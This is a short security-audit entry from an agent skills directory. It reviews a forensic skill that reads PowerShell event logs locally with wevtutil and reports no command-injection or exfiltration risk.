The Agent Skills Directory

[COMMAND_EXECUTION]: The script 'scripts/agent.py' utilizes 'subprocess.run' to execute the Windows 'wevtutil' utility for querying audit logs. The implementation follows security best practices by passing arguments as a list rather than a shell-interpolated string, mitigating command injection risks.
[DATA_EXFILTRATION]: The skill accesses sensitive system information by reading PowerShell Operational and Module event logs. This data exposure is an essential component of the skill's forensic purpose and is performed strictly within the local environment without any network exfiltration mechanisms.

analyzing-powershell-empire-artifacts